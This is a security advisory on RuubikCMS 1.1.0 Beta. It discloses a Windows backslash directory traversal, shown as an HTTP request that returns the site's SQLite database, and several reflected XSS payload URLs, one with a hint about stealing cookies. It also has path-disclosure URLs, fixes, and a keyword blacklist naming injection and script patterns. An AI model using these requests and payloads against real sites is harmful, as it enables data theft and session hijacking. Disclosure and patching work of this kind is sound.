RuubikCMS 1.1.0 Beta XSS / Disclosure / Directory Traversal

Posted May 23, 2012
Authored by Akastep

RuubikCMS version 1.1.0 Beta suffers from cross site scripting, information disclosure, and directory traversal vulnerabilities.

tags | exploit, vulnerability, xss, file inclusion, info disclosure
MD5 | dbca1c445b9b9049982dc2e17c9a37be

=========================================================
Vulnerable software: RuubikCMS Version 1.1.0 Beta
Official site: http://www.ruubikcms.com/
Downloaded from: http://www.ruubikcms.com/ruubikcms/download.php?f=ruubikcms111.zip
=========================================================
Tested:
php.ini: MAGIC_QUOTES_GPC OFF
Safe mode: Off
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MySQL: 5.5.24
=========================================================

Vuln Desc:
RuubikCMS Version 1.1.0 Beta is prone to directory traversal, XSS,
information disclosure and path disclosure.
=========================================================

1) Traversal vuln:
//ruubikcms/extra/image.php
Vulnerable code section:
(To exploit this vuln you need to be authenticated to the application.)
*On Windows, this vuln can be exploited by authenticated users to escalate privileges to admin.*
==============SNIP==================
<?php
// --- Image displayer with authentication
// --- Sample call: image.php?f=imgfile.jpg
// --- Sample call with subfolder: image.php?f=subfolder/imgfile.jpg

require('../ruubikcms/includes/dbconfig.php');
$dbh = new PDO(PDO_DB_DRIVER.':../'.RUUBIKCMS_FOLDER.'/'.PDO_DB_FOLDER.'/'.PDO_DB_NAME); // database connection object
require('../ruubikcms/includes/commonfunc.php');
define('LOGOUT_TIME', query_single("SELECT logout_time FROM options WHERE id = 1"));
require('login/session.php');

// check if logged in
if (!@$_SESSION['uid']) die("Access denied.");

// images directory
define('BASE_DIR','useruploads/images/');

// make sure program execution doesn't time out
@set_time_limit(0);

if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image.");
if (strstr($_GET['f'], '../')) die('Error');
$fpath = BASE_DIR.$_GET['f'];
if (!is_file($fpath)) die("File does not exist.");

// file size in bytes
// $fsize = filesize($fpath);

// get mime type
$mtype = '';

if (function_exists('mime_content_type')) {
    $mtype = mime_content_type($fpath);
} elseif (function_exists('finfo_file')) {
    $finfo = finfo_open(FILEINFO_MIME); // return mime type
    $mtype = finfo_file($finfo, $fpath);
    finfo_close($finfo);
}

if ($mtype == '') {
    $mtype = "image/jpeg";
}

header("Content-type: $mtype");
readfile($fpath);
?>
=====================================


The check above only rejects `../`. On Windows the backslash is also a directory separator, so `..\` walks out of BASE_DIR and the check is bypassed.
Exploit:

GET /learn/ruubikcms/extra/image.php?f=..\..\..\ruubikcms\sqlite\ruubikcms.sqlite HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: cmslogin=1vbnblnfsb367lgoovsr1qdo2b9c2hav

=============================*RAW response body:*=============================


HTTP/1.1 200 OK
Date: Tue, 22 May 2012 12:01:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: image/jpeg

34800
SQLite format 3
[binary SQLite page data elided]
CREATE TABLE "page" ("pageurl" text PRIMARY KEY ,"name" text,"title" text,"header1" text,"description" text,
"keywords" text,"content" text,"mother" text,"levelnum" integer,"ordernum" integer,"image1" text,"image2" text,
"lang" text,"pagetype" integer,"extracode" text,"status" integer, "updater" TEXT, "updated" TEXT, "creator" TEXT)
[binary data elided]
CREATE TABLE "site" ("id" integer PRIMARY KEY ,"name" text,"doctype" integer,"charset" text,"robots" text,
"title" text,"description" text,"keywords" text,"copyright" text,"author" text,"lang" text,"gacode" text,
"news_textlink" INTEGER,"news_readmore" INTEGER,"news_showdate" INTEGER,"news_maxshort" INTEGER, "no_image1"
INTEGER, "no_image2" INTEGER, "clean_url" INTEGER, "url_suffix" TEXT, "news_num" INTEGER, "siteroot" TEXT,
"news_read
[binary data elided]
RuubikCMS Demoiso-8859-1index,followRuubikCMS DemoRuubikCMSIisakki Piril, Henrik Valrosfi
Read more
[binary data elided]
====================================EOF SNIP=====================================

Use Fiddler to intercept the RAW body of the response.




How to fix:
Open //ruubikcms/extra/image.php
Change lines 22 and 23 to this:

//============BEGIN===========
// Normalise backslashes to '/' before the check, so a Windows-style "..\" segment is rejected as well as "../"
if (strstr(str_replace('\\', '/', $_GET['f']), '../')) die('Error');
$fpath = BASE_DIR.$_GET['f'];
//============END=============
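A more robust containment check, added here as an example and not part of the advisory or of RuubikCMS: rather than searching the raw parameter for `../`, it normalises backslashes, resolves the requested file with realpath() and serves it only if the resolved path lies inside the upload directory. The function names, the temporary directory tree it builds and the sample inputs are all constructed for the demonstration; it needs PHP 7.1 or later.

```php
<?php
// Added example (not RuubikCMS code): path containment for an image-serving
// script such as extra/image.php. Helper names are my own.

function resolve_inside_base(string $baseDir, string $userPath): ?string
{
    // Treat backslashes as separators: on Windows "..\" traverses exactly
    // like "../", which is what a plain strstr('../') check misses.
    $normalised = str_replace('\\', '/', $userPath);

    // Reject empty input, NUL bytes and absolute paths outright; none of
    // them ever names an uploaded image.
    if ($normalised === '' || strpos($normalised, "\0") !== false
        || $normalised[0] === '/' || preg_match('/^[A-Za-z]:/', $normalised)) {
        return null;
    }

    // Resolve both to canonical absolute paths. realpath() returns false for
    // files that do not exist, which also covers the is_file() case.
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $normalised);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }

    // Containment check: the resolved file must sit below the resolved base.
    // Compare with a trailing separator so "images_private" is not accepted
    // as a child of "images".
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $base, strlen($base)) !== 0) {
        return null;
    }
    return $full;
}

// Self-contained demonstration on a temporary tree constructed here:
//   <tmp>/useruploads/images/ok.jpg          -> allowed
//   <tmp>/useruploads/images/sub/pic.jpg     -> allowed via "sub/pic.jpg"
//   <tmp>/ruubikcms/sqlite/ruubikcms.sqlite  -> must be refused
function demo(): array
{
    $root   = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'imgcheck_' . bin2hex(random_bytes(4));
    $images = $root . '/useruploads/images';
    mkdir($images . '/sub', 0700, true);
    mkdir($root . '/ruubikcms/sqlite', 0700, true);
    file_put_contents($images . '/ok.jpg', 'jpeg-bytes');
    file_put_contents($images . '/sub/pic.jpg', 'jpeg-bytes');
    file_put_contents($root . '/ruubikcms/sqlite/ruubikcms.sqlite', 'SQLite format 3');

    $cases = [
        'ok.jpg',
        'sub/pic.jpg',
        '../../ruubikcms/sqlite/ruubikcms.sqlite',       // forward-slash traversal
        '..\\..\\ruubikcms\\sqlite\\ruubikcms.sqlite',   // backslash traversal, as in the advisory
        'sub/../../../ruubikcms/sqlite/ruubikcms.sqlite', // traversal hidden behind a valid segment
        '/etc/passwd',                                   // absolute path
    ];
    $results = [];
    foreach ($cases as $c) {
        $results[$c] = resolve_inside_base($images, $c) !== null ? 'ALLOW' : 'DENY';
    }

    // Remove the constructed tree again.
    foreach (['/useruploads/images/sub/pic.jpg', '/useruploads/images/ok.jpg',
              '/ruubikcms/sqlite/ruubikcms.sqlite'] as $f) {
        unlink($root . $f);
    }
    foreach (['/useruploads/images/sub', '/useruploads/images', '/useruploads',
              '/ruubikcms/sqlite', '/ruubikcms', ''] as $d) {
        rmdir($root . $d);
    }
    return $results;
}

foreach (demo() as $input => $verdict) {
    printf("%-52s %s\n", $input, $verdict);
}
```

Run it from the command line; the first two inputs print ALLOW and the rest DENY. Because the decision is made on the resolved path rather than on the raw string, encodings and separator tricks all collapse to the same question: is the final file under the upload directory or not.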





2) Due to several XSS vulns in the third-party TinyBrowser 1.41 component
(TinyBrowser 1.41 - A TinyMCE file browser (C) 2008 Bryn Jones,
author website: http://www.lunarvis.com),
RuubikCMS is also vulnerable to XSS.
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/folders.php?type=image&folder=&feid="/>a<script>alert(1);</script>

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&feid="</a><script>alert(1);</script>
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image"</a><script>alert(1);</script>&folder=&feid=owned
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?feid="</a><script>alert("AkaStep");</script>

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&find="><script>alert("AkaStep");</script>


HINT: charcode it if you want to steal cookies.


For @admins, @users, @webmasters:
To prevent these XSS vulns, see below (remember this is not an ideal solution, it is only a *workaround*):
Save all of this as antikiddie.php and upload it to:

/ruubikcms/tiny_mce/plugins/tinybrowser/

Then open config_tinybrowser.php and include antikiddie.php from it.


===================BEGIN==============
<?php
// antikiddie.php
// Include it at the bottom of
// /ruubikcms/tiny_mce/plugins/tinybrowser/config_tinybrowser.php
// (after its opening <?php tag), like this:
//   include 'antikiddie.php';
//
// Another note: more patterns could be added here, but that may break
// the application's API, so a lot of them were left out.

// error_reporting() takes an integer level; the original passed the
// string 'off', which is not a valid level (and a TypeError on PHP 7+).
error_reporting(0);

// Blacklisted substrings (exact duplicates from the original list removed).
// The single-quoted '\x00', '\n', '\r' and '\\x1a' match the literal escape
// sequences, not the control bytes, as in the original.
$commonpatterns = array(
    "$", "/*", "*", "union", '"', '\'', "0x",
    "where", "concat", "concat_ws", "group_concat",
    "information_schema", "tables", "columns",
    "hex", "table_name", "column_name", "distinct",
    "/*!", "*/", "into", "load_file", '(', ')',
    "outfile", "truncate", "drop", "delete", ";", "+", "substr", "update",
    '\x00', '\n', '\r', '\\', '\\x1a',
    "schemata", "mysql", "convert", "using", "char", "`", "|", "from",
    "table", "dumpfile", "php",
    '<', '>', '<script>', 'base64', 'alert', '</script>', '%0d%0a',
    'document.write', ',', 'String.fromCharCode', '..', 'document.cookie', 'cookie',
    'eval', 'href', 'document.location', 'location.replace', 'window',
    'onmouse', 'onblur', 'onfocus', 'onerror', 'limit', 'javascript'
);

// Case-insensitive match of every pattern against the decoded query string.
$query = isset($_SERVER['QUERY_STRING']) ? urldecode($_SERVER['QUERY_STRING']) : '';
foreach ($commonpatterns as $myvals) {
    if (stristr($query, $myvals) !== false) {
        die('<script>alert("No Scriptkidding! :)");</script>' . PHP_EOL .
            '<h1>Can\'t Proceed your request! It is malicious.</h1>');
    }
}
unset($myvals);
?>



==================END=================
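As a longer-term alternative to the blacklist above, here is an added example (my own code, not TinyBrowser's or RuubikCMS's) of handling the type, folder and feid parameters the way these reflections call for: validate each against an allowlist and encode whatever is echoed back for its HTML context. The function names are mine, and the assumption that type only ever takes the values image, media or file is mine as well; the sample inputs reuse the payloads quoted in this advisory. A substring blacklist like antikiddie.php also refuses legitimate requests, since any query string containing a comma, a parenthesis or the word php is rejected, whereas validation plus encoding lets ordinary input through and renders hostile input as inert text.

```php
<?php
// Added example (not TinyBrowser or RuubikCMS code): allowlist validation and
// context-aware output encoding for the reflected parameters. PHP 7.1+.

// TinyBrowser's type parameter names one of its browsers; the three values
// here are an assumption based on the "type=image" URLs in the advisory.
function valid_type(string $type): ?string
{
    return in_array($type, ['image', 'media', 'file'], true) ? $type : null;
}

// feid is a form element id handed back to the editor; restricting it to a
// plain identifier means it can never carry quotes, angle brackets or slashes.
function valid_feid(string $feid): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $feid) === 1 ? $feid : null;
}

// folder is a relative sub-folder: only safe path segments, never "..".
function valid_folder(string $folder): ?string
{
    if ($folder === '') {
        return '';
    }
    return preg_match('#^(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+/?$#', $folder) === 1 ? $folder : null;
}

// Context-specific encoders. ENT_QUOTES escapes both quote styles, which is
// what neutralises the "\"</a><script>" break-out shown in the advisory.
function esc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
function esc_attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build the link TinyBrowser derives from these parameters. Invalid input is
// answered with a generic message instead of being echoed back.
function render_browser_link(array $get): string
{
    $type   = valid_type($get['type'] ?? '');
    $feid   = valid_feid($get['feid'] ?? '');
    $folder = valid_folder($get['folder'] ?? '');
    if ($type === null || $feid === null || $folder === null) {
        return '<p>Invalid request.</p>';
    }
    // URL-encode each query value, then attribute-encode the whole href once
    // (esc_attr turns the raw '&' separators into '&amp;').
    $href = 'edit.php?type=' . rawurlencode($type)
          . '&folder=' . rawurlencode($folder)
          . '&feid=' . rawurlencode($feid);
    return '<a href="' . esc_attr($href) . '" id="' . esc_attr($feid) . '">'
         . esc_html($folder === '' ? $type : $folder) . '</a>';
}

// Demonstration with constructed input: one benign request and two of the
// advisory's payloads.
$benign  = ['type' => 'image', 'folder' => 'photos', 'feid' => 'img1'];
$attack1 = ['type' => 'image', 'folder' => '', 'feid' => '"</a><script>alert(1);</script>'];
$attack2 = ['type' => 'image"</a><script>alert(1);</script>', 'folder' => '', 'feid' => 'owned'];

echo render_browser_link($benign), PHP_EOL;   // normal link
echo render_browser_link($attack1), PHP_EOL;  // rejected by valid_feid()
echo render_browser_link($attack2), PHP_EOL;  // rejected by valid_type()

// Even without the allowlist, the encoder alone leaves the payload harmless:
// the quote and angle brackets become &quot; &lt; &gt; and stay inside the attribute.
echo esc_attr($attack1['feid']), PHP_EOL;
```

The two layers are deliberately independent: the allowlist keeps unexpected input out of the application logic, and the encoder guarantees that whatever does reach the page cannot change its structure, so a gap in one does not defeat the other.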


3) Info disclosure, giving more information about the system:
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/error.log


4)Path disclosure:
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php


Notice: Use of undefined constant NEWS - assumed 'NEWS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 4
NEWS

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31



http://192.168.0.15/learn/ruubikcms/extra/login/session.php



Notice: Use of undefined constant LOGOUT_TIME - assumed 'LOGOUT_TIME' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\extra\login\session.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/dbconnection.php


Notice: Use of undefined constant PDO_DB_DRIVER - assumed 'PDO_DB_DRIVER' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3

Notice: Use of undefined constant PDO_DB_FOLDER - assumed 'PDO_DB_FOLDER' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3

Notice: Use of undefined constant PDO_DB_NAME - assumed 'PDO_DB_NAME' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3
could not find driver


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/extrapagemenu.php


Notice: Use of undefined constant EXTRAPAGES - assumed 'EXTRAPAGES' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 4
EXTRAPAGES



Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/footer.php

Notice: Use of undefined constant VERSION - assumed 'VERSION' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant VERNUM - assumed 'VERNUM' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
VERSION VERNUM
Notice: Use of undefined constant THANKYOUTEXT - assumed 'THANKYOUTEXT' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant DOCUMENTATION - assumed 'DOCUMENTATION' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant FEEDBACK - assumed 'FEEDBACK' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
THANKYOUTEXT RuubikCMS | DOCUMENTATION | FEEDBACK



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/head.php
See title of page.


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/mainmenu.php
A lot of notices.


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/multilang.php



Notice: Undefined variable: multilang_links in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\multilang.php on line 2

Warning: Invalid argument supplied for foreach() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\multilang.php on line 2



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/pagemenu.php


Notice: Use of undefined constant WEBPAGES - assumed 'WEBPAGES' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 4
WEBPAGES



Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 17


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/required.php


Warning: require(../includes/dbconfig.php) [function.require]: failed to open stream: No such file or directory in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\required.php on line 4

Fatal error: require() [function.require]: Failed opening required '../includes/dbconfig.php' (include_path='.;C:\php5\pear') in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\required.php on line 4


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/snippetmenu.php

Notice: Use of undefined constant SNIPPETS - assumed 'SNIPPETS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 4
SNIPPETS
TinyMCE

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/usersmenu.php

Notice: Use of undefined constant USERS - assumed 'USERS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 4
USERS

Notice: Use of undefined constant ADMINISTRATORS - assumed 'ADMINISTRATORS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 15
ADMINISTRATORS

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 21

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 21



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/login/form.php


http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/filelink/filelink.php



http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_standalone.js.php

function tinyBrowserPopUp(type, formelementid, folder)
{
  tburl = "/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php" + "?type=" + type + "&feid=" + formelementid;
  if (folder !== undefined) tburl += "&folder=" + folder + "%2F";
  newwindow = window.open(tburl, 'tinybrowser', 'height=495,width=785,scrollbars=yes,resizable=yes');
  if (window.focus) { newwindow.focus() }
  return false;
}

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_tinymce.js.php
Contains full path to application in plaintext.

http://192.168.0.15/learn/ruubikcms/ruubikcms/website/scripts/jquery.lightbox-0.5.js.php
Direct Plaintext output.




Workaround for the info disclosure:

Open ruubikcms\tiny_mce\plugins\tinybrowser\fns_tinybrowser.php

Change line 423 to this:
=========BEGIN========
//error_log($err, 3, 'error.log');
=========END==========


or you can try:


=========BEGIN========
error_log($err, 3, 'error_log');
=========END==========

Do not forget to remove your old error.log.



Workaround for the path disclosures:
Open your main .htaccess file (if public_html/.htaccess does not exist,
create a new one) and copy/paste this:

==========BEGIN======

php_value error_reporting off




==========END========

This disables all error reporting, so errors, warnings and notices are no longer output.



Vendor notified about the vulns.




++++As always My Special Thanks to:++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com &&
to all AA Team
++++++++++++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^












